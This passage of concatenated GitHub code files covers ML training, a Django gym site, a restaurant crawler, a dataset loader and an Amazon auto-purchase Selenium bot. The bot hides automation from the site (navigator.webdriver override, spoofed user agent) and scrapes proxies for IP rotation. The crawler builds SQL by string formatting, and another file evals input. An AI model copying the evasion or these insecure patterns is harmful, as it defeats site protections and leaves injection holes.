test_occurrence_accuracy, test_occurrence_precision, test_f1_score, test_rmse = return_precision_recall_f1(\n test_predict, torch_test_y)\n test_nonoccurrence_accuracy, test_nonoccurrence_precision, test_nonf1_score, test_rmse = return_precision_recall_f1(\n test_predict, torch_test_y, 0)\n\n # append test predict to list\n test_nonoccurrence_list.append(test_nonoccurrence_accuracy)\n test_occurrence_list.append(test_occurrence_accuracy)\n test_occurrence_precision_list.append(test_occurrence_precision)\n test_f1_score_list.append(test_f1_score)\n test_rmse_list.append(test_rmse)\n\n # train predict\n train_predict = torch.round(torch.sigmoid(network(\n torch.tensor(torch.tensor(np.array(train_x), dtype=torch.float32), dtype=torch.float).cuda()).clone().detach())).cpu().detach().numpy().squeeze()\n train_occurrence_accuracy, train_occurrence_precision, train_f1_score, train_rmse = return_precision_recall_f1(\n train_predict, train_y)\n train_nonoccurrence_accuracy, train_nonoccurrence_precision, train_nonf1_score, train_rmse = return_precision_recall_f1(\n train_predict, train_y, 0)\n\n # append train predict to list\n train_nonoccurrence_list.append(train_nonoccurrence_accuracy)\n train_occurrence_list.append(train_occurrence_accuracy)\n train_occurrence_precision_list.append(train_occurrence_precision)\n train_f1_score_list.append(train_f1_score)\n train_rmse_list.append(train_rmse)\n\n # save torch model\n torch.save(network.state_dict(), save_path + str(obs_point) + \"\\\\\" + str(\n vis_limit_num) + 
'\\\\Train_{}_under_{}_{}_{}_{}_{}_{}_{}_{}.pth'.format(\n obs_point, vis_limit_num, num_unit_1, num_unit_2, num_unit_3, lr, batch_size, n_epochs, drop_out))\n\n # save model result to csv file\n result_df = pd.DataFrame({'Train Recall(non)': train_nonoccurrence_list,\n 'Train Recall': train_occurrence_list,\n 'Train precision': train_occurrence_precision_list,\n 'Train F1 score': train_f1_score_list,\n 'Train RMSE': train_rmse_list,\n 'Test Recall(non)': test_nonoccurrence_list,\n 'Test Recall': test_occurrence_list,\n 'Test precision': test_occurrence_precision_list,\n 'Test F1 score': test_f1_score_list,\n 'Test RMSE': test_rmse_list,})\n\n # Save Model parameters Result\n columns = ['layer_1', 'layer_2', 'layer_3', 'lr', 'bs', 'epochs', 'drop_out']\n nn_structure = pd.DataFrame(all_parameters_list, columns=columns)\n result_df = pd.concat([result_df, nn_structure], axis=1)\n sort_result_df = result_df.sort_values('Test RMSE', ascending=True)\n file_info = \"{}_{}_all_model_result\".format(str(obs_point), str(vis_limit_num)) + \".csv\"\n sort_result_df.to_csv(save_path + str(obs_point) + \"\\\\\" + str(vis_limit_num) + '\\\\' + file_info)\n","repo_name":"hahw94/Fog_DNN","sub_path":"run/occrun.py","file_name":"occrun.py","file_ext":"py","file_size_in_byte":13290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26640174219","text":"import media\nimport website_generator\n\n__author__ = 'ali786'\n\n# Creating instances of Movie class which will show up on the web page\nvirgin_snow = media.Movie(\"Virgin Snow\",\n \"Returning to Japan, \"\n \"a man tries to find \"\n \"the beautiful woman who captured his heart.\",\n \"https://upload.wikimedia.org/wikipedia/en/thumb/5/50/Virgin_Snow_%28film%29.jpg/220px-Virgin_Snow_%28film%29.jpg\", # noqa\n \"https://www.youtube.com/watch?v=P2mRL3ZBfp0\", # noqa\n \"Romance\")\nparadise_kiss = media.Movie(\"Paradise Kiss\",\n \"A heartwarming love story.\",\n \"https://upload.wikimedia.org/wikipedia/en/thumb/0/08/Paradise_Kiss_Movie_Poster.jpg/220px-Paradise_Kiss_Movie_Poster.jpg\", # noqa\n \"https://www.youtube.com/watch?v=zkH_4nDmOTM\", # noqa\n \"Romance\")\nlaundry = media.Movie(\"Laundry\",\n \"Sensitive, romantic and \"\n \"heart-touching tale of a pure soul.\",\n \"http://asianwiki.com/images/a/aa/Laundryposter.jpg\", # noqa\n \"https://www.youtube.com/watch?v=1At_7Y3rNIE\", # noqa\n \"Slice of Life\")\na_millionaires_first_love = media.Movie(\"A Millionaire's First Love\",\n \"A story showcasing that \"\n \"Nothing is more important\"\n \"than the true love of one's heart.\",\n \"https://upload.wikimedia.org/wikipedia/en/thumb/d/da/A_Millionaire%27s_First_Love.jpg/220px-A_Millionaire%27s_First_Love.jpg\", # noqa\n \"https://www.youtube.com/watch?v=k-JQ797aBwc\", # noqa\n \"Romance\")\na_moment_to_remember = media.Movie(\"A Moment to Remember\",\n \"A tale of discovery \"\n \"in a relationship and \"\n \"the burdens of loss \"\n \"caused by Alzheimer's disease.\",\n \"https://upload.wikimedia.org/wikipedia/en/thumb/7/76/A_Moment_to_Remember_Poster.jpg/220px-A_Moment_to_Remember_Poster.jpg\", # noqa\n \"https://www.youtube.com/watch?v=LFLSwFEiANg\", # noqa\n \"Romance\")\nthe_wings_of_the_bird = media.Movie(\"The Wings of the Kirin\",\n \"A thriller detective story \"\n \"with subtle philosophical moments\",\n \"https://upload.wikimedia.org/wikipedia/en/thumb/2/23/The_Wings_of_the_Kirin_film_poster.jpg/220px-The_Wings_of_the_Kirin_film_poster.jpg\", # noqa\n 
\"https://www.youtube.com/watch?v=IMvnC2GjbGs\", # noqa\n \"Thriller\")\n\n# Creating a list of the movie objects\nfavourite_movies = [\n virgin_snow,\n paradise_kiss,\n laundry,\n a_millionaires_first_love,\n a_moment_to_remember,\n the_wings_of_the_bird]\n\n# Calling the generator for the web page\nwebsite_generator.open_movies_page(favourite_movies)\n","repo_name":"ongakugene/movie-trailers","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4909450335","text":"dictionary = {\"cat\": \"gato\", \"perro\": \"chien\", \"caballo\": \"cheval\"}\nwords = ['gato', 'leon', 'caballo']\n\n\n\nfor word in words:\n if word in dictionary:\n print(word, \"->\", dictionary[word])\n else:\n print(word, \"No esta en el diccionario\")\n","repo_name":"David-alzate/Programacion","sub_path":"python/Diccionarios/ejemplo1.py","file_name":"ejemplo1.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20225982202","text":"'''\r\nAlex\r\nBot Program for Amazon\r\n'''\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.common.exceptions import TimeoutException\r\nimport time\r\nimport random\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.add_experimental_option(\"excludeSwitches\", [\"enable-automation\"])\r\noptions.add_experimental_option('useAutomationExtension', False) \r\n#options.add_argument('--headless')\r\noptions.add_argument(\"user-data-dir=C:/Users/Alex/AppData/Local/Google/Chrome/User Data\")\r\noptions.add_argument(\"--user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36\")\r\noptions.add_argument(\"--disable-blink-features=AutomationControlled\")\r\ndriver = webdriver.Chrome('C:/chromedriver.exe', options=options)\r\ndriver.execute_script(\"Object.defineProperty(navigator, 'webdriver', {get: () => undefined})\")\r\n\r\ndriver.get(\"https://www.amazon.com/dp/B08HHDP9DW/?coliid=I3FSKH16WR7GUO&colid=3PM8NMET43SN6&psc=0&ref_=lv_ov_lig_dp_it\")\r\nrando = (random.uniform(2.7, 5.2))\r\nrefreshee = (random.uniform(25.6, 35.7))\r\nrandScroll = random.randint(240,600)\r\ntime.sleep(rando)\r\n\r\na = driver.find_element_by_xpath\r\nb = driver.find_elements_by_xpath\r\n\r\n\r\nwhile len(b('//*[@id=\"add-to-cart-button\"]')) == 0:\r\n print('Not found')\r\n time.sleep(refreshee)\r\n driver.refresh()\r\n driver.execute_script(\"window.scrollTo(0,\"+str(randScroll)+\");\") \r\n\r\na('//*[@id=\"add-to-cart-button\"]').click()\r\n\r\n#This is option for warranty... 
if it exists click no\r\ntime.sleep(rando)\r\nif len(b('//*[@id=\"siNoCoverage-announce\"]')) > 0:\r\n a('//*[@id=\"siNoCoverage-announce\"]').click()\r\n\r\ntime.sleep(rando)\r\n\r\n#go to the cart \r\na('//*[@id=\"nav-cart-count-container\"]').click()\r\ntime.sleep(rando)\r\na('//*[@id=\"sc-buy-box-ptc-button\"]/span/input').click()\r\ntime.sleep(rando)\r\n\r\n#if prime sign up is asked then click no\r\nif len(b('//*[@id=\"signup_cancel\"]')) > 0:\r\n a('//*[@id=\"signup_cancel\"]').click()\r\n \r\ntime.sleep(rando)\r\n\r\n#apply discover cashback to purchase\r\na('//*[@id=\"inline-points-button\"]/span/span[1]').click()\r\ntime.sleep(rando)\r\n\r\n#free shipping option\r\na('//*[@id=\"spc-orders\"]/div[1]/div/div[3]/div/div/div[2]/div[2]/div[1]/fieldset/div[2]/input').click()\r\ntime.sleep(rando)\r\n\r\n\r\n'''\r\n#place order\r\na('//*[@id=\"placeYourOrder\"]/span/input')\r\n'''\r\n\r\n#Sign in to amazon\r\nurl = (\"https://www.amazon.com/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fcss%2Fhomepage.html%3Fref_%3Dnav_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=usflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&\")\r\ndriver.get(url)\r\n\r\ntime.sleep(1.1)\r\ndriver.find_element_by_xpath('//*[@id=\"ap_email\"]').send_keys('email@gmail.com')\r\ntime.sleep(1.9)\r\ndriver.find_element_by_xpath('//*[@id=\"continue\"]').click()\r\n\r\ndriver.find_element_by_xpath('//*[@id=\"ap_password\"]').send_keys('password')\r\ntime.sleep(1.6)\r\ndriver.find_element_by_xpath('//*[@id=\"signInSubmit\"]').click()\r\ntime.sleep(.75)\r\ndriver.find_element_by_xpath('//*[@id=\"authportal-main-section\"]/div[2]/div/div/div/form/div/div[2]/div/div/label/div/label/input').click()\r\n\r\ndriver.get(\"https://sslproxies.org/\")\r\ndriver.find_element_by_xpath('//*[@id=\"proxylisttable_filter\"]/label/input').send_keys('United States elite')\r\ntime.sleep(2)\r\n\r\n#ips = driver.find_element_by_xpath('//*[@id=\"proxylisttable\"]/tbody/tr[1]/td[1]').text\r\n#ports = driver.find_element_by_xpath('//*[@id=\"proxylisttable\"]/tbody/tr[1]/td[2]').text\r\nips = [my_elem.get_attribute(\"innerHTML\") for my_elem in WebDriverWait(driver, 5).until(EC.visibility_of_all_elements_located((By.XPATH, \"//table[@class='table table-striped table-bordered dataTable']//tbody//tr[@role='row']/td[position() = 1]\")))]\r\nports = [my_elem.get_attribute(\"innerHTML\") for my_elem in WebDriverWait(driver, 5).until(EC.visibility_of_all_elements_located((By.XPATH, \"//table[@class='table table-striped table-bordered dataTable']//tbody//tr[@role='row']/td[position() = 2]\")))]\r\ndriver.quit()\r\n\r\n\r\n#PROXY SETUP NOT FINISHED\r\n'''\r\nproxies = []\r\nfor i in range(0, len(ips)):\r\n proxies.append(ips[i]+':'+ports[i])\r\nprint(proxies)\r\n\r\nfor i in range(0, len(proxies)):\r\n try:\r\n options.add_argument('--proxy-server={}'.format(proxies[i]))\r\n driver = webdriver.Chrome(options=options, executable_path=r'C:/Users/molte/Downloads/chromedriver_win32/chromedriver.exe')\r\n driver.get(\"https://amazon.com/\")\r\n print('YAH')\r\n except Exception:\r\n driver.quit()\r\n\r\n'''\r\n","repo_name":"MoltenMarlin/OnlineBot","sub_path":"OnlineBot.py","file_name":"OnlineBot.py","file_ext":"py","file_size_in_byte":4911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"19591271317","text":"from django.shortcuts import render, redirect\nfrom django.views.generic import TemplateView, FormView, ListView, CreateView\nfrom django.views import View\nimport stripe\nfrom django.conf import settings\nfrom django.core.mail import send_mail\nfrom .models import MembershipPlan, MembershipPlanPrice\nfrom users.models import Account, Membership\nimport datetime\nfrom datetime import datetime as dt\nfrom dateutil.relativedelta import relativedelta\nfrom django.contrib import messages\nstripe.api_key = settings.STRIPE_SECRET_KEY\nclass Index(TemplateView):\n    template_name = 'gym_app/index.html'\n\n\n\nclass Checkout(View):\n    def post(self, request, *args, **kwargs):\n        price = MembershipPlanPrice.objects.get(id=self.kwargs[\"pk\"])\n        print(price.membership_plan)\n        DOMAIN = 'http://127.0.0.1:8000'\n        checkout_session = stripe.checkout.Session.create(\n            payment_method_types = ['card'],\n            line_items = [\n                {\n                    'price' : price.stripe_price,\n                    'quantity': 1,\n                },\n            ],\n            mode = 'payment',\n            success_url = DOMAIN + '/success/',\n            cancel_url = DOMAIN,\n        )\n        # Check if user has active plan\n        acc_user = Account.objects.get(user = self.request.user)\n        query_date = Membership.objects.filter(account = acc_user).latest('date')\n        iterable_query_date = Membership.objects.filter(account = acc_user)\n        \n        if query_date.date == datetime.date.today():\n            return redirect('gym:index')\n        if datetime.date.today() < query_date.date + relativedelta(months=1): # latest plan is still active\n            return redirect('gym:index')\n        else:\n            for date in iterable_query_date:\n                if date.date == datetime.date.today():\n                    return redirect('gym:index')\n            else:\n                user_progress = Account.objects.get(user = self.request.user)\n                user_progress.user_progress += 1\n                Account.objects.filter(user = self.request.user).update(user_progress = user_progress.user_progress)\n                Membership.objects.create(account = acc_user, date = datetime.date.today(), membership_plan = price.membership_plan)\n\n        return redirect(checkout_session.url)\n\nclass PlanView(TemplateView):\n    template_name = \"gym_app/plan.html\"\n    def get_context_data(self, **kwargs):\n        context = super().get_context_data(**kwargs)\n        plan = MembershipPlan.objects.get(name = \"Monthly Plan\")\n        price = MembershipPlanPrice.objects.filter(membership_plan = plan)\n\n        context['plan'] = plan\n        context['price_fields'] = price\n\n        return context\n\nclass PlansView(ListView):\n    template_name = 'gym_app/plans.html'\n    model = MembershipPlan\n    def get_context_data(self, **kwargs):\n        context = super().get_context_data(**kwargs)\n        # gets all plans\n        name_of_plans = MembershipPlan.objects.all()\n\n        # Displays warning message to users that have active plan\n        acc_user = Account.objects.get(user = self.request.user)\n        query_date = Membership.objects.filter(account = acc_user).latest('date')\n\n        if query_date.date == datetime.date.today():\n            messages.warning(self.request, 'You bought gym plan today. If you buy another one it will not count in your progress track!')\n        elif datetime.date.today() < query_date.date + relativedelta(months=1): # latest plan is still active\n            messages.warning(self.request, \"Your gym plan didn't expire yet. 
If you buy another one it will not count in your progress track!\")\n else:\n pass\n context['name_of_plans'] = name_of_plans\n return context\n\nclass Success(TemplateView):\n template_name = 'gym_app/success.html'\n\n \nclass CancelView(TemplateView):\n template_name = 'gym_app/cancel.html'\n\n\ndef send_email(request):\n if request.method == 'POST':\n first_name = request.POST['first_name']\n last_name = request.POST['last_name']\n email = request.POST['email']\n problem_description = request.POST['problem_description']\n send_mail(\n 'User problem',\n 'First name: '+first_name+'\\nLast name: '+last_name +'\\n'\n 'Problem description: '+problem_description,\n email,\n ['stefan.programming22@gmail.com'],\n )\n return render(request, 'gym_app/help.html')\n\n \n return render(request, 'gym_app/help.html')\n\n\nclass AboutView(TemplateView):\n template_name = 'gym_app/about.html'\n\n\nclass AccountView(TemplateView):\n template_name = 'gym_app/account.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n account_user = Account.objects.get(user = self.request.user)\n membership = Membership.objects.filter(account = account_user)\n stars = []\n for i in membership:\n print(i.account.user)\n print(i.date)\n print(i.plan)\n progress = i.date\n stars.append(progress)\n print(account_user)\n context['membership'] = membership\n context['account'] = account_user\n context['stars'] = stars\n \n return context\n\n","repo_name":"vstefan22/Gym-site","sub_path":"gym_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39297659868","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 19 01:07:55 2019\r\n\r\n@author: Pyardeep Birdi\r\n\"\"\"\r\n\r\nfrom project.models import db\r\ndb.create_all()\r\n\r\n\r\ns = 'hello$world$this$is$best'\r\ns = s.replace('$',',')\r\nprint(s)\r\n","repo_name":"bpyardeep/Python-Flask","sub_path":"project/creating_db.py","file_name":"creating_db.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15741679634","text":"from selenium import webdriver\nimport time\nfrom selenium.webdriver.common.by import By\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.keys import Keys\nimport pymysql\n\nconn = pymysql.connect(host='127.0.0.1', user='root', password='1234', db=\"lunch_db\")\ncur = conn.cursor()\n\n\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument(\"headless\")\ndriver = webdriver.Chrome(service=Service(ChromeDriverManager().install()), options=chrome_options)\ndriver.get(\"https://map.kakao.com/?q=%EC%9D%B4%EB%8F%84%EA%B3%B0%ED%83%95%20%EB%B3%B8%EC%A0%90%20%EA%B7%BC%EC%B2%98%20%EC%8B%9D%EB%8B%B9\")\n\ntime.sleep(3)\n\ndef get_menus (title):\n menus = {}\n try:\n more_button = driver.find_element(By.CSS_SELECTOR, '#mArticle > div.cont_menu > a')\n more_button.send_keys(Keys.ENTER)\n except:\n print('hi')\n\n names = driver.find_elements(By.XPATH, '//*[@id=\"mArticle\"]/div/ul/li/div/span')\n prices = driver.find_elements(By.XPATH, '//*[@id=\"mArticle\"]/div/ul/li/div/em')\n prices2 = driver.find_elements(By.CSS_SELECTOR, 'em.price_menu')\n\n menus['메뉴'] = []\n menus['가격'] = []\n\n for i in range(len(names)):\n menus['메뉴'].append(names[i].text)\n\n if prices[i].text != 
'':\n menus['가격'].append(prices[i].text)\n cur.execute('INSERT INTO menu (store, name, price) values ({},{},{})'.format('\"' + title + '\"', '\"' + names[i].text + '\"', '\"' + prices[i].text + '\"'))\n else:\n menus['가격'].append(prices2[i].text)\n cur.execute('insert into menu(store, name, price) values({},{},{})'.format('\"' + title + '\"', '\"' + names[i].text + '\"', '\"' + prices2[i].text + '\"'))\n conn.commit()\n return menus\n\n\n\n\ndef crawl (menus, title_arr, page, goal):\n if page == 1:\n more_place = driver.find_element(By.CSS_SELECTOR, \"#info\\.search\\.place\\.more\")\n more_place.send_keys(Keys.ENTER)\n print('succeed', 'page = ', page)\n time.sleep(3)\n\n if page > 1:\n next_button = driver.find_element(By.CSS_SELECTOR, \"#info\\.search\\.page\\.next\")\n next_button.send_keys(Keys.ENTER)\n print('succeed', 'page = ', page)\n time.sleep(3)\n\n if page > goal:\n print (menus, title_arr)\n return menus, title_arr\n\n\n titles = driver.find_elements(By.CSS_SELECTOR, \"a.link_name\")\n details = driver.find_elements(By.CSS_SELECTOR, \"div.contact.clickArea > a.moreview\")\n\n for i in range(len(titles)):\n print(titles[i].text)\n cur.execute('insert into store(name) values({})'.format('\"' + titles[i].text + '\"'))\n title = titles[i].text\n title_arr.append(title)\n print(title)\n details[i].send_keys(Keys.ENTER)\n time.sleep(3)\n driver.switch_to.window(driver.window_handles[-1])\n try:\n menus[title] = get_menus(title)\n except:\n print('이런')\n\n# menus[title] = get_menus(title)\n\n driver.close()\n driver.switch_to.window(driver.window_handles[0])\n print('hi')\n conn.commit()\n page += 1\n\n crawl(menus, title_arr, page, goal)\n\n\n\n\n# more_place = driver.find_element(By.CSS_SELECTOR, \"#info\\.search\\.place\\.more\")\n#\n# more_place.send_keys(Keys.ENTER)\n# print('succeed')\n#\n# time.sleep(1)\n#\n# next_button = driver.find_element(By.CSS_SELECTOR, \"#info\\.search\\.page\\.next\")\n# next_button.send_keys(Keys.ENTER)\n# print('succeed')\n#\n# time.sleep(1)\n#\n# next_button.send_keys(Keys.ENTER)\n# print('succeed')\n\n\n\ndef main():\n\n\n\n menus = {}\n title_arr = []\n page = 0\n\n crawl(menus, title_arr, page, 15)\n\n conn.commit()\n driver.quit()\n\n\nmain()\nconn.close()\n","repo_name":"PPS-FE-SIDE/lunch","sub_path":"server/crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32939632322","text":"from __future__ import annotations\n\nimport argparse\nimport enum\nimport sys\nfrom dataclasses import dataclass\nfrom typing import TextIO\n\nfrom more_itertools import grouper\n\nPacket = list[\"Packet\"] | int\n\n\nclass Comparison(enum.Enum):\n CORRECT = 1\n INCORRECT = 2\n UNDEFINED = 3\n\n\ndef compare(left: Packet, right: Packet) -> Comparison:\n # print(f\" compare {left} vs {right}\")\n if isinstance(left, int) and isinstance(right, int):\n if left == right:\n return Comparison.UNDEFINED\n elif left < right:\n return Comparison.CORRECT\n else:\n return Comparison.INCORRECT\n\n left = left if isinstance(left, list) else [left]\n right = right if isinstance(right, list) else [right]\n for le, ri in zip(left, right):\n result = compare(le, ri)\n if result != Comparison.UNDEFINED:\n return result\n if len(right) == len(left):\n return Comparison.UNDEFINED\n if len(right) < len(left):\n return Comparison.INCORRECT\n return Comparison.CORRECT\n\n\ndef bubble_sort(packets: list[Packet]) -> None:\n \"\"\"\n Damn I need to memorize 
this.\n \"\"\"\n n = len(packets)\n\n # Traverse through all array elements\n for i in range(n):\n\n # Last i elements are already in place\n for j in range(0, n - i - 1):\n\n # traverse the array from 0 to n-i-1\n # Swap if the element found is greater\n # than the next element\n if compare(packets[j], packets[j + 1]) == Comparison.INCORRECT:\n packets[j], packets[j + 1] = packets[j + 1], packets[j]\n\n\ndef main(args: Arguments) -> None:\n indexes_sum = 0\n\n all_packets = list[Packet]()\n\n for i, (first_line, second_line, _) in enumerate(\n grouper(args.infile, 3, incomplete=\"fill\", fillvalue=\"\")\n ):\n left = eval(first_line)\n right = eval(second_line)\n result = compare(left, right)\n # print(\n # dedent(\n # f\"\"\"\n # == Pair {i + 1} ==\n # Compare {first_line.strip()} vs {second_line.strip()}\n # Right order? {result.name}\n # \"\"\"\n # )\n # )\n if result == Comparison.CORRECT:\n indexes_sum += i + 1\n all_packets.append(left)\n all_packets.append(right)\n print(indexes_sum)\n\n divider_2: Packet = [[2]]\n divider_6: Packet = [[6]]\n all_packets.append(divider_2)\n all_packets.append(divider_6)\n\n bubble_sort(all_packets)\n for item in all_packets:\n print(item)\n\n first_divider_index = all_packets.index(divider_2) + 1\n second_divider_index = all_packets.index(divider_6) + 1\n print(first_divider_index * second_divider_index)\n\n\n@dataclass\nclass Arguments:\n infile: TextIO = sys.stdin\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"infile\", type=argparse.FileType(\"r\"))\n\n args = Arguments()\n parser.parse_args(namespace=args)\n main(args)\n","repo_name":"rbusquet/advent-of-code","sub_path":"aoc_2022/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"12128065340","text":"import streamlit as st\n\nfrom modules.simple_ml_models import HousePriceModel\n\n\n@st.cache\ndef load_model():\n return HousePriceModel()\n\n\nif __name__ == '__main__':\n house_price_model = load_model()\n\n title = \"=> HousePriceModel <=\"\n st.markdown(f\"
<h1 style='text-align: center'>\"\n                f\"{title}</h1>
\", unsafe_allow_html=True)\n\n with st.form(\"my_form\"):\n\n n_floors = st.number_input('N floors', min_value=1, max_value=10, value=1)\n area = st.slider('Area', min_value=1, max_value=300, value=50)\n\n heating = st.radio('Heating', \"A B C\".split())\n\n submitted = st.form_submit_button('Submit')\n if submitted:\n result_price = house_price_model(n_floors=n_floors, area=area, heating=heating)\n output_text = f\"Price ≈ {result_price}\"\n st.markdown(f\"
<h2 style='text-align: center'>{output_text}</h2>
\",\n unsafe_allow_html=True)\n","repo_name":"as1mple/ml_course_onseo","sub_path":"src/st_1.py","file_name":"st_1.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25292997971","text":"from fg_config import *\n\nfor sub in all_sub_args:\n subj = bids_meta(sub)\n for run in [1,2,3]:\n df = pd.read_csv(f'{subj.subj_dir}/ses-2/func/{subj.fsub}_ses-2_task-memory_run-0{run}_events.tsv',sep='\\t')\n df.trial_type = df.trial_type + '_' + df.encode_phase\n df.to_csv(f'{subj.preproc_dir}/func/{subj.fsub}_ses-2_task-memory_run-0{run}_space-MNI152NLin2009cAsym_desc-preproc_denoised_bold_events.tsv',sep='\\t',index=False)\n\nfrom fg_config import *\nfrom scipy.io import loadmat\n\nrois = ['vmPFC','dACC','amyg_cem','amyg_bla','hc_head','hc_body','hc_tail','animal','tool']\nconds = ['CS+_acquisition', 'CS+_baseline', 'CS+_extinction', 'CS+_foil', 'CS-_acquisition', 'CS-_baseline', 'CS-_extinction', 'CS-_foil']\ndf = pd.DataFrame({'conn':0.0},index=pd.MultiIndex.from_product([conds,all_sub_args,rois,rois],names=['condition','subject','seed','target']))\n\nfor c, cond in enumerate(conds):\n stats = loadmat(f'conn_project01/results/firstlevel/gPPI_03/resultsROI_Condition00{c+1}.mat')\n for s, sub in enumerate(all_sub_args):\n for si, seed in enumerate(rois):\n for ti, target in enumerate(rois):\n df.loc[(cond,sub,seed,target),'conn'] = stats['Z'][si,ti,s]\n\ndf = df.dropna(subset=['conn'])\n\ndf['csp_cat'] = ''\ndf = df.reset_index()\ndf['group'] = df.subject.apply(lgroup)\ndf['phase'] = df.condition.apply(lambda x: x[4:])\ndf['condition'] = df.condition.apply(lambda x: x[:3])\ndf = df.set_index(['group','phase','condition','seed','target','subject']).sort_index()\n\ndf = df.reset_index().set_index('subject')\nfor sub in all_sub_args:\n subj = bids_meta(sub)\n csp = subj.mem_df[subj.mem_df.trial_type == 'CS+']['stimulus'].values[0].split('/')[0][:-1]\n df.loc[sub,'csp_cat'] = csp\n# csm = subj.mem_df[subj.mem_df.trial_type == 'CS-']['stimulus'].values[0].split('/')[0][:-1]\n\n# cats[sub] = {csp:'csp',\n# csm:'csm'}\n# for roi in rois:\n# if roi not in ['animal','tool']:\n# cats[sub][roi] = roi\n\n# df['seed'] = df[['subject','seed']].apply(lambda x: cats[x[0]][x[1]],axis=1)\n# df['target'] = df[['subject','target']].apply(lambda x: cats[x[0]][x[1]],axis=1)\n\ndf.to_csv('conn_stats_lmm.csv')\n\n\npfc = df.reset_index().set_index(['target','group','phase','condition','seed','subject']).sort_index()\npfc = pfc.loc['vmPFC'] - pfc.loc['dACC']\npfc = pfc.dropna(subset=['conn'])\npfc.to_csv('conn_pfc_diff_lmm.csv')\n\n\naHPC = df.reset_index()\naHPC = aHPC[aHPC.seed == 'hc_head'][aHPC.target.isin(['vmPFC','dACC'])]","repo_name":"dunsmoorlab/gPPI","sub_path":"conn_utils.py","file_name":"conn_utils.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10815958700","text":"import os\nimport re\nfrom operator import itemgetter\nimport numpy as np\nimport torch.utils.data as data\nimport torchvision.transforms as transforms\n\nfrom data_processing import *\n\nclass FDDataset(data.Dataset):\n \"\"\"The class of dataset.\n\n >>> root = '/home/jaren/data/'\n >>> train_FD = FDDataset(root=root, train=True)\n >>> test_FD = FDDataset(root=root, train=False)\n >>> len(train_FD)\n 3566\n >>> len(test_FD)\n 2027\n >>> train_FD = FDDataset(root=root, train=True, single=False)\n >>> len(train_FD)\n 500\n \"\"\"\n def 
__init__(self, root, transform=None, train=True,\n loader=default_loader, single=True):\n\n if train:\n path = os.path.join(root, 'train')\n else:\n path = os.path.join(root, 'test')\n\n imgs = make_dataset(path)\n\n if not single:\n imgs.sort(key=itemgetter('id'))\n imgs = split_with_same_id(imgs)\n\n if len(imgs) == 0:\n raise(RuntimeError(\"Found 0 images in: \" + path + \"\\n\"\n \"Supported image extensions are: \" +\n \",\".join(IMG_EXTENSIONS)))\n\n self.root = root\n self.imgs = imgs\n self.transform = transform\n self.train = train\n self.loader = loader\n self.single = single\n\n def dict2dict(self, sample):\n \"\"\"\n input:(dict){'path':path, 'id': id, 'pose': pose, 'name': fname}\n output: (dict){'image': img, 'identity': identity, 'pose': pose, 'name': name}\n \"\"\"\n identity = sample['id']\n pose = sample['pose']\n img = self.loader(sample['path'])\n name = '{0}_{1}'.format(sample['id'], sample['name'])\n\n if self.transform:\n img = self.transform(img)\n\n return {'image': img,\n 'identity': identity,\n 'pose': pose,\n 'name': name}\n\n def __getitem__(self, idx):\n item = self.imgs[idx]\n if self.single:\n assert isinstance(item, dict)\n return self.dict2dict(item)\n else:\n assert isinstance(item, list)\n return [self.dict2dict(i) for i in item]\n\n def __len__(self):\n return len(self.imgs)\n\nif __name__ == '__main__':\n root = '/home/jaren/data/'\n transform = transforms.Compose([\n transforms.Scale((100, 100)), #Switch to the transforms.Resize on the service\n transforms.CenterCrop(96),\n transforms.ToTensor(),\n transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))\n ])\n train_FD = FDDataset(root=root, train=True, transform=transform)\n test_FD = FDDataset(root=root, train=False, transform=transform)\n s = train_FD[78]\n show_sample(s)\n\n train_FD = FDDataset(root=root, train=True, transform=transform, single=False)\n samples = train_FD[100]\n for sample in samples:\n 